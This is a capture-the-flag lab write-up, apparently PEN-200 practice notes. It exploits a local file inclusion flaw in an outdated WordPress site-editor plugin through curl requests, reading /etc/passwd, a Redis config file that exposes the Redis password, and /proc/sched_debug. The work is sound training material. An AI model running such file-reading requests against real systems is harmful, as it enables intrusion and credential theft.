Local File Inclusion
LFI has been identified in the target WordPress application due to an outdated plugin, site-editor, being installed.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ curl http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
redis:x:107:114::/var/lib/redis:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
{"success":true,"data":{"output":[]}} LFI confirmed
Redis Password
The target Redis instance is locked behind a password authentication. LFI can be leveraged to exfiltrate the Redis authentication password
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ curl -s http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf | grep -v '^[#/]'
bind 0.0.0.0
protected-mode no
port 6379
tcp-backlog 511
timeout 0
tcp-keepalive 300
daemonize yes
supervised no
pidfile /var/run/redis/redis-server.pid
loglevel notice
logfile /var/log/redis/redis-server.log
databases 16
always-show-logo yes
save 900 1
save 300 10
save 60 10000
stop-writes-on-bgsave-error yes
rdbcompression yes
rdbchecksum yes
dbfilename dump.rdb
dir /var/lib/redis
replica-serve-stale-data yes
replica-read-only yes
repl-diskless-sync no
repl-diskless-sync-delay 5
repl-disable-tcp-nodelay no
replica-priority 100
requirepass Ready4Redis?
lazyfree-lazy-eviction no
lazyfree-lazy-expire no
lazyfree-lazy-server-del no
replica-lazy-flush no
appendonly no
appendfilename "appendonly.aof"
appendfsync everysec
no-appendfsync-on-rewrite no
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
aof-load-truncated yes
aof-use-rdb-preamble yes
lua-time-limit 5000
slowlog-log-slower-than 10000
slowlog-max-len 128
latency-monitor-threshold 0
notify-keyspace-events ""
hash-max-ziplist-entries 512
hash-max-ziplist-value 64
list-max-ziplist-size -2
list-compress-depth 0
set-max-intset-entries 512
zset-max-ziplist-entries 128
zset-max-ziplist-value 64
hll-sparse-max-bytes 3000
stream-node-max-bytes 4096
stream-node-max-entries 100
activerehashing yes
client-output-buffer-limit normal 0 0 0
client-output-buffer-limit replica 256mb 64mb 60
client-output-buffer-limit pubsub 32mb 8mb 60
hz 10
dynamic-hz yes
aof-rewrite-incremental-fsync yes
rdb-save-incremental-fsync yes
{"success":true,"data":{"output":[]}}Password string identified; Ready4Redis?
Running Processes
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ curl -s http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/proc/sched_debug
Sched Debug Version: v0.11, 4.19.0-18-amd64 #1
ktime : 2302516.690844
sched_clk : 2302520.435527
cpu_clk : 2302520.170379
jiffies : 4295467900
sched_clock_stable() : 1
sysctl_sched
.sysctl_sched_latency : 6.000000
.sysctl_sched_min_granularity : 0.750000
.sysctl_sched_wakeup_granularity : 1.000000
.sysctl_sched_child_runs_first : 0
.sysctl_sched_features : 4118331
.sysctl_sched_tunable_scaling : 1 (logaritmic)
cpu#0, 2649.999 MHz
.nr_running : 2
.load : 2097152
.nr_switches : 1754280
.nr_load_updates : 322630
.nr_uninterruptible : 0
.next_balance : 4294.892296
.curr->pid : 914
.clock : 2302520.293559
.clock_task : 2302520.293559
.cpu_load[0] : 0
.cpu_load[1] : 1
.cpu_load[2] : 1
.cpu_load[3] : 0
.cpu_load[4] : 0
.avg_idle : 1000000
.max_idle_balance_cost : 500000
cfs_rq[0]:/
.exec_clock : 0.000000
.MIN_vruntime : 22921.927323
.min_vruntime : 22924.927323
.max_vruntime : 22921.927323
.spread : 0.000000
.spread0 : 0.000000
.nr_spread_over : 0
.nr_running : 2
.load : 2097152
.runnable_weight : 2097152
.load_avg : 33
.runnable_load_avg : 18
.util_avg : 33
.util_est_enqueued : 32
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_sum : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0
rt_rq[0]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.000000
.rt_runtime : 950.000000
dl_rq[0]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 22875.122728 2200 120 0.000000 517.746307 0.000000 0 0 /
S kthreadd 2 21274.515223 148 120 0.000000 0.920561 0.000000 0 0 /
I rcu_gp 3 13.960746 2 100 0.000000 0.001840 0.000000 0 0 /
I rcu_par_gp 4 15.960951 2 100 0.000000 0.001160 0.000000 0 0 /
I kworker/0:0H 6 744.854614 4 100 0.000000 0.034510 0.000000 0 0 /
I mm_percpu_wq 8 22.029925 2 100 0.000000 0.001120 0.000000 0 0 /
S ksoftirqd/0 9 22920.837642 19328 120 0.000000 121.828014 0.000000 0 0 /
I rcu_sched 10 22921.616622 116274 120 0.000000 383.833863 0.000000 0 0 /
I rcu_bh 11 28.031028 2 120 0.000000 0.000580 0.000000 0 0 /
S migration/0 12 0.000000 581 0 0.000000 3.247178 0.000000 0 0 /
R kworker/0:1 13 22921.927323 28877 120 0.000000 642.670924 0.000000 0 0 /
S cpuhp/0 14 1153.811109 10 120 0.000000 0.051010 0.000000 0 0 /
S kdevtmpfs 15 1318.232012 135 120 0.000000 0.340560 0.000000 0 0 /
I netns 16 39.054040 2 100 0.000000 0.001580 0.000000 0 0 /
S kauditd 17 1140.312641 4 120 0.000000 0.027271 0.000000 0 0 /
S khungtaskd 18 22848.452091 21 120 0.000000 1.433632 0.000000 0 0 /
S oom_reaper 19 45.055349 2 120 0.000000 0.000790 0.000000 0 0 /
I writeback 20 47.055515 2 100 0.000000 0.001320 0.000000 0 0 /
S kcompactd0 21 49.056447 2 120 0.000000 0.001260 0.000000 0 0 /
S ksmd 22 51.058039 2 125 0.000000 0.001280 0.000000 0 0 /
S khugepaged 23 22834.889025 227 139 0.000000 8.586302 0.000000 0 0 /
I crypto 24 55.056707 2 100 0.000000 0.000940 0.000000 0 0 /
I kintegrityd 25 57.056976 2 100 0.000000 0.000850 0.000000 0 0 /
I kblockd 26 59.058103 2 100 0.000000 0.002410 0.000000 0 0 /
I edac-poller 27 134.295078 2 100 0.000000 0.001680 0.000000 0 0 /
I devfreq_wq 28 135.795655 2 100 0.000000 0.001460 0.000000 0 0 /
S watchdogd 29 0.000000 2 0 0.000000 0.001450 0.000000 0 0 /
S kswapd0 30 628.404740 3 120 0.000000 0.006380 0.000000 0 0 /
I kthrotld 48 499.154215 2 100 0.000000 0.001739 0.000000 0 0 /
S irq/24-pciehp 49 0.000000 2 49 0.000000 0.003911 0.000000 0 0 /
S irq/25-pciehp 50 0.000000 2 49 0.000000 0.001750 0.000000 0 0 /
S irq/26-pciehp 51 0.000000 2 49 0.000000 0.001550 0.000000 0 0 /
S irq/27-pciehp 52 0.000000 2 49 0.000000 0.001580 0.000000 0 0 /
S irq/28-pciehp 53 0.000000 2 49 0.000000 0.001490 0.000000 0 0 /
S irq/29-pciehp 54 0.000000 2 49 0.000000 0.001450 0.000000 0 0 /
S irq/30-pciehp 55 0.000000 2 49 0.000000 0.001540 0.000000 0 0 /
S irq/31-pciehp 56 0.000000 2 49 0.000000 0.001430 0.000000 0 0 /
S irq/32-pciehp 57 0.000000 2 49 0.000000 0.001420 0.000000 0 0 /
S irq/33-pciehp 58 0.000000 2 49 0.000000 0.001470 0.000000 0 0 /
S irq/34-pciehp 59 0.000000 2 49 0.000000 0.001658 0.000000 0 0 /
S irq/35-pciehp 60 0.000000 2 49 0.000000 0.001490 0.000000 0 0 /
S irq/36-pciehp 61 0.000000 2 49 0.000000 0.001340 0.000000 0 0 /
S irq/37-pciehp 62 0.000000 2 49 0.000000 0.001770 0.000000 0 0 /
S irq/38-pciehp 63 0.000000 2 49 0.000000 0.001422 0.000000 0 0 /
S irq/39-pciehp 64 0.000000 2 49 0.000000 0.001460 0.000000 0 0 /
S irq/40-pciehp 65 0.000000 2 49 0.000000 0.001430 0.000000 0 0 /
S irq/41-pciehp 66 0.000000 2 49 0.000000 0.001610 0.000000 0 0 /
S irq/42-pciehp 67 0.000000 2 49 0.000000 0.001510 0.000000 0 0 /
S irq/43-pciehp 68 0.000000 2 49 0.000000 0.001310 0.000000 0 0 /
S irq/44-pciehp 69 0.000000 2 49 0.000000 0.001490 0.000000 0 0 /
S irq/45-pciehp 70 0.000000 2 49 0.000000 0.001531 0.000000 0 0 /
S irq/46-pciehp 71 0.000000 2 49 0.000000 0.001470 0.000000 0 0 /
S irq/47-pciehp 72 0.000000 2 49 0.000000 0.001400 0.000000 0 0 /
S irq/48-pciehp 73 0.000000 2 49 0.000000 0.001490 0.000000 0 0 /
S irq/49-pciehp 74 0.000000 2 49 0.000000 0.001330 0.000000 0 0 /
S irq/50-pciehp 75 0.000000 2 49 0.000000 0.001380 0.000000 0 0 /
S irq/51-pciehp 76 0.000000 2 49 0.000000 0.001350 0.000000 0 0 /
S irq/52-pciehp 77 0.000000 2 49 0.000000 0.001402 0.000000 0 0 /
S irq/53-pciehp 78 0.000000 2 49 0.000000 0.001430 0.000000 0 0 /
S irq/54-pciehp 79 0.000000 2 49 0.000000 0.001850 0.000000 0 0 /
S irq/55-pciehp 80 0.000000 2 49 0.000000 0.001420 0.000000 0 0 /
I ipv6_addrconf 81 596.167463 2 100 0.000000 0.001720 0.000000 0 0 /
I kworker/u2:1 83 22892.264121 598 120 0.000000 40.449995 0.000000 0 0 /
I kstrp 92 622.126727 2 100 0.000000 0.001671 0.000000 0 0 /
S scsi_eh_0 133 743.928874 2 120 0.000000 0.002160 0.000000 0 0 /
I scsi_tmf_0 136 744.787166 2 100 0.000000 0.003080 0.000000 0 0 /
Ivmw_pvscsi_wq_0 138 745.645238 2 100 0.000000 0.002760 0.000000 0 0 /
I ata_sff 141 747.804357 2 100 0.000000 0.002140 0.000000 0 0 /
I kworker/u2:2 142 1356.877421 44 120 0.000000 0.303198 0.000000 0 0 /
I kworker/0:1H 143 22901.942692 4491 100 0.000000 66.306166 0.000000 0 0 /
S scsi_eh_1 146 1159.179812 38 120 0.000000 2.327715 0.000000 0 0 /
I scsi_tmf_1 148 751.959541 2 100 0.000000 0.001610 0.000000 0 0 /
S scsi_eh_2 150 860.619253 4 120 0.000000 10.575894 0.000000 0 0 /
I scsi_tmf_2 152 754.960677 2 100 0.000000 0.002060 0.000000 0 0 /
I kworker/u3:0 221 958.633047 2 100 0.000000 0.001620 0.000000 0 0 /
S jbd2/sda1-8 223 22823.425459 1030 120 0.000000 29.570685 0.000000 0 0 /
Iext4-rsv-conver 224 983.431573 2 100 0.000000 0.002111 0.000000 0 0 /
Ssystemd-journal 256 22759.066302 635 120 0.000000 193.063781 0.000000 0 0 /
S systemd-udevd 273 22875.044248 910 120 0.000000 51.632894 0.000000 0 0 /
I ttm_swap 335 1155.952478 2 100 0.000000 0.003370 0.000000 0 0 /
S irq/16-vmwgfx 338 0.000000 3 49 0.000000 0.013590 0.000000 0 0 /
Ssystemd-timesyn 393 22875.100668 228 120 0.000000 56.982963 0.000000 0 0 /
S sd-resolve 408 16707.340437 79 120 0.000000 7.186294 0.000000 0 0 /
S VGAuthService 394 1323.273051 176 120 0.000000 9.399665 0.000000 0 0 /
S vmtoolsd 396 22921.393492 24798 120 0.000000 951.283725 0.000000 0 0 /
S gmain 535 1868.128763 38 120 0.000000 0.260692 0.000000 0 0 /
S systemd-logind 407 22875.102028 208 120 0.000000 26.800429 0.000000 0 0 /
S cron 409 22757.781871 145 120 0.000000 6.922119 0.000000 0 0 /
S dbus-daemon 410 22735.673058 2249 120 0.000000 109.975012 0.000000 0 0 /
S rsyslogd 411 15403.074139 41 120 0.000000 2.666538 0.000000 0 0 /
S in:imuxsock 442 22757.766289 198 120 0.000000 5.819385 0.000000 0 0 /
S in:imklog 443 1318.233922 8 120 0.000000 1.236580 0.000000 0 0 /
S rs:main Q:Reg 444 22757.766851 206 120 0.000000 6.837415 0.000000 0 0 /
S agetty 461 1586.925671 12 120 0.000000 1.634360 0.000000 0 0 /
S sshd 467 3757.114886 87 120 0.000000 12.775751 0.000000 0 0 /
S redis-server 481 22924.927323 362463 120 0.000000 17731.037646 0.000000 0 0 /
S redis-server 487 1360.879140 1 120 0.000000 0.006390 0.000000 0 0 /
S redis-server 488 1360.737083 1 120 0.000000 0.007190 0.000000 0 0 /
S redis-server 489 1360.635059 1 120 0.000000 0.012310 0.000000 0 0 /
S mysqld 525 18600.335895 450 120 0.000000 43.556225 0.000000 0 0 /
S mysqld 527 1445.511183 1 120 0.000000 0.017020 0.000000 0 0 /
S mysqld 528 22613.312119 77 120 0.000000 2.183323 0.000000 0 0 /
S mysqld 537 22920.525723 4600 120 0.000000 24.888717 0.000000 0 0 /
S mysqld 538 22921.043592 4630 120 0.000000 32.103609 0.000000 0 0 /
S mysqld 539 22920.526512 4600 120 0.000000 28.623877 0.000000 0 0 /
S mysqld 540 22920.525202 4600 120 0.000000 26.096134 0.000000 0 0 /
S mysqld 541 22920.524571 4600 120 0.000000 21.413660 0.000000 0 0 /
S mysqld 542 22920.536492 4600 120 0.000000 53.589472 0.000000 0 0 /
S mysqld 543 22921.006972 4607 120 0.000000 53.892264 0.000000 0 0 /
S mysqld 544 22921.042592 4629 120 0.000000 27.621898 0.000000 0 0 /
S mysqld 545 22921.042092 4605 120 0.000000 25.353953 0.000000 0 0 /
S mysqld 546 22921.048362 4624 120 0.000000 41.974583 0.000000 0 0 /
S mysqld 547 22912.063910 2448 120 0.000000 31.099820 0.000000 0 0 /
S mysqld 579 22911.585437 2300 120 0.000000 39.257240 0.000000 0 0 /
S mysqld 580 22911.599879 2300 120 0.000000 37.886319 0.000000 0 0 /
S mysqld 581 22856.707296 460 120 0.000000 4.303861 0.000000 0 0 /
S mysqld 582 22909.618567 243 120 0.000000 6.446527 0.000000 0 0 /
S mysqld 583 22856.718106 460 120 0.000000 9.274380 0.000000 0 0 /
S mysqld 584 22912.072160 2362 120 0.000000 50.412441 0.000000 0 0 /
S mysqld 585 8187.090774 748 120 0.000000 10.296805 0.000000 0 0 /
S mysqld 586 8186.251593 325 120 0.000000 3.153001 0.000000 0 0 /
S mysqld 587 8186.250983 325 120 0.000000 2.600481 0.000000 0 0 /
S mysqld 588 8186.250113 321 120 0.000000 2.612158 0.000000 0 0 /
S mysqld 589 1567.902166 32 120 0.000000 2.402094 0.000000 0 0 /
S mysqld 590 22911.847239 2300 120 0.000000 27.936913 0.000000 0 0 /
S mysqld 591 1560.218027 1 120 0.000000 0.002830 0.000000 0 0 /
S mysqld 592 1559.932067 1 120 0.000000 0.016870 0.000000 0 0 /
S mysqld 593 1564.407398 3 120 0.000000 0.027990 0.000000 0 0 /
S mysqld 594 1567.781946 10 120 0.000000 0.374550 0.000000 0 0 /
S mysqld 1146 18607.724658 20 120 0.000000 1.916341 0.000000 0 0 /
S apache2 526 22913.290839 2471 120 0.000000 228.139253 0.000000 0 0 /
>R apache2 914 22922.823973 5271 120 0.000000 295.019528 0.000000 0 0 /
S apache2 956 18566.082758 5429 120 0.000000 275.458062 0.000000 0 0 /
S apache2 1015 19097.448083 3797 120 0.000000 187.637943 0.000000 0 0 /
S apache2 1020 17499.261900 3864 120 0.000000 184.952092 0.000000 0 0 /
S apache2 1023 17562.854466 3763 120 0.000000 179.837267 0.000000 0 0 /
S apache2 1027 17758.859853 3688 120 0.000000 194.726033 0.000000 0 0 /
S apache2 1046 19734.794328 2434 120 0.000000 119.726454 0.000000 0 0 /
S apache2 1050 17996.404176 1817 120 0.000000 91.450455 0.000000 0 0 /
S apache2 1052 18973.574321 1854 120 0.000000 92.132145 0.000000 0 0 /
S apache2 1060 18610.826537 613 120 0.000000 42.646958 0.000000 0 0 /
I kworker/0:2 1139 21277.546491 157 120 0.000000 9.439991 0.000000 0 0 /
I kworker/0:0 1153 22919.725131 60 120 0.000000 3.382911 0.000000 0 0 /
{"success":true,"data":{"output":[]}} Nothing stands out that might have sensitive information in the cmdline
N/A